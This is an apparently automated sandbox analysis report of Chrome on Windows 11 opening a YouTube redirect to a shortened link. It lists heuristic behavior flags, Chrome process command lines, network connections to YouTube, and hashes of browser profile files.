SHA512 177bfff575af1764cf593ff1d4b88c60b881ed66ef7e4ec84a79aa222f0f179d592578caf63b1b335f481499c77190994e463081fa47af9cd8a3e58de42a21ba

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-24 23:01

Reported

2024-03-24 23:32

Platform

win11-20240221-en

Max time kernel

1799s

Max time network

1685s

Command Line

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://www.youtube.com/redirect?event=comments&redir_token=QUFFLUhqbEdvM2JacWNycElueGhMazlTei16UW9PYmlJQXxBQ3Jtc0treDgtLVJhNUdxbDlBXzVkdEh6a3ZNYkFKMURVVWFha3c3LUhZZk84dUg4Q1VRNFBGOHE4TUJpckxHeHRSN2xaQWhVSU5OQlNMSmNaUHBWbjU1VzBtRi1FdGdEMmZDZFAwQ2NFM0xqYWVPUVZXOHA5RQ&q=https%3A%2F%2Fbit.ly%2F3Trfb6a&stzid=UgzgSIxotTTHMiWttmF4AaABAg

Signatures

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133557949524222617" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4372 wrote to memory of 2580 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2580 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 4440 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 4440 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2272 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2272 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2272 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2272 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2272 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2272 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2272 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2272 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2272 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2272 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2272 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2272 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2272 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2272 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2272 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2272 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2272 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2272 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2272 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2272 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2272 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2272 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://www.youtube.com/redirect?event=comments&redir_token=QUFFLUhqbEdvM2JacWNycElueGhMazlTei16UW9PYmlJQXxBQ3Jtc0treDgtLVJhNUdxbDlBXzVkdEh6a3ZNYkFKMURVVWFha3c3LUhZZk84dUg4Q1VRNFBGOHE4TUJpckxHeHRSN2xaQWhVSU5OQlNMSmNaUHBWbjU1VzBtRi1FdGdEMmZDZFAwQ2NFM0xqYWVPUVZXOHA5RQ&q=https%3A%2F%2Fbit.ly%2F3Trfb6a&stzid=UgzgSIxotTTHMiWttmF4AaABAg

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff94ac29758,0x7ff94ac29768,0x7ff94ac29778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1668 --field-trial-handle=1856,i,3321024703543647972,14680449521278965012,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1856,i,3321024703543647972,14680449521278965012,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2200 --field-trial-handle=1856,i,3321024703543647972,14680449521278965012,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2996 --field-trial-handle=1856,i,3321024703543647972,14680449521278965012,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3004 --field-trial-handle=1856,i,3321024703543647972,14680449521278965012,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4716 --field-trial-handle=1856,i,3321024703543647972,14680449521278965012,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4840 --field-trial-handle=1856,i,3321024703543647972,14680449521278965012,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2348 --field-trial-handle=1856,i,3321024703543647972,14680449521278965012,131072 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.youtube.com udp
GB 142.250.180.14:443 www.youtube.com tcp
GB 142.250.180.14:443 www.youtube.com tcp
US 8.8.8.8:53 234.16.217.172.in-addr.arpa udp
GB 142.250.180.14:443 www.youtube.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp

Files

\??\pipe\crashpad_4372_DARGNBHNZVMPWSMO

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 e1090d56f49a843616088700d6d105f4
SHA1 fe0233b1054afd649515f4e9896540ad9cca200b
SHA256 467ef44e5fa0c735646a5504ecbf94dfa357eaa9018179f1eb404db1b34d9b1d
SHA512 3c8160dfbc7f7a9f41d5793387e7a76f90550aab268aa891934c5876d209c720c7076b91355902cc739e31d39c341433b3790c4c60082e2b22837b7e3c166fef

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 a372fa11a1a3544aa37b306ce95e1a04
SHA1 91b4962726c52b8e3eea83cbcbfeb5d84dc6951b
SHA256 fcf2903e64b197a7a4edf36b5fb43b9e0e22158d9ebdfbed2a9d5ea33436fcc2
SHA512 20e68b2ef1dd7d85b59b5243f04983a1d7ba06ed9e8250b3371b2da09929866ed695992f575c39801a070563e8dd1b5c415069b9bc5f8210457d2a6795d5c1d9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 cc69bd7daac64ff5b8bff28a3376e33d
SHA1 6ccea5b9ccfcf5244c14caa85cb4681b1935586d
SHA256 4e1f6c42992369d55fefdc9a5c16d936f6267e33b8beea582da4b4001aa0f7dd
SHA512 168a3caf941425f451d399b4bfb61ea08bc8b462f7033e3ef5033fd2cc956b6dae2afdfbf4cf6fa2c68faec6507f5ef03ca275289cf9c4e5d57e33094b7fc049

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 c83dd179ee869aa4e63ed2ee12294b10
SHA1 c45c0c2ef7b8c4d1f7f4419edb6cc0b9bd52e2dc
SHA256 7c435a9d1b68cdd2903453057c9999573b1cf2bf6720f335da448da305cd4a09
SHA512 8e21316d9ca11526217af82d37a1048f1cbe35ee8456b6a581af114a40c0ad7a5f55d9dc337d844907910df45df6f1eb54bf1ad6ddfe7bd6fe42e3aa5788160a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 854a69ff777cdeda6f731ec32ada684e
SHA1 ce2079667b3578985d3b65c62e3fc160b4b570a9
SHA256 ade94360ea532a9179fb3310d200e6c553af0c178c5ae81d4680954364389c30
SHA512 fc6f39b6c566c8ab93241c5b9b3993991071ff74611237b87cdc7effec8b0e538042760048f673e6cdcc24efd03ff59ce2d3fcb4a8760848d2bff6de06373557

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 0570b2e9dc506e708a7e26c224dc2a90
SHA1 c3bb615552b3a009bbc79cefb26bc7d0101e1870
SHA256 3cf431f73ed967ebb5327cdd65c3777e259ecf3bc964d24d2c06466a67fea913
SHA512 3cc3cafbb5576d33afb8330c327cd16695888d2d532794b6fa3240379521107a6c838f7727d8b53496a8538a20a46535b7bc17c393926b2c586c3258c02e3bba